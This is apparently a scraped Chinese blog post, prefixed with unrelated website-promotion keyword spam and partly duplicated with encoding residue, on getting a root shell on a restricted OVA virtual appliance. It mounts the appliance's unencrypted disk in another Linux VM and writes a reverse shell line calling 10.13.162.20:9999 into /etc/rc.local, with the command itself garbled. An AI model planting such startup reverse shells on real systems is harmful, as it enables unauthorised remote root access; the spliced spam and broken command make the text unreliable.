做网站推广广告,建设淘宝客网站多少钱,学校文化建设的网站,成都做网站公司场景描述
某个系统是ova文件#xff0c;导入虚拟机启动#xff0c;但是启动后只有一个伪终端权限#xff0c;即权限很小#xff0c;如何拿到这个虚拟机的shell权限呢#xff1f;
实际操作
这次运气比较好#xff0c;所遇到的系统磁盘并没有被加密#xff0c;所以直接…场景描述
某个系统是ova文件导入虚拟机启动但是启动后只有一个伪终端权限即权限很小如何拿到这个虚拟机的shell权限呢
实际操作
这次运气比较好所遇到的系统磁盘并没有被加密所以直接导入虚拟机后使用DiskGenius查看生成的vmdk文件定位到所需要挂载的盘符为/dev/sda1。 所以直接新开启一台linux虚拟机选择添加硬盘并选择刚才的vmdk文件 进入虚拟机shell后可以使用lsblk命令查看盘符然后使用如下命令进行挂载
mkdir mydisk1
mount /dev/sda1 mydisk1
cd mydisk1进去后找到/etc/rc.local文件将反弹shell命令输入到该文件中
bash -i /dev/tcp/10.13.162.20/9999 01 然后本机开启监听成功拿到root权限
参考连接
https://badmonkey.site/archives/vm-getshell
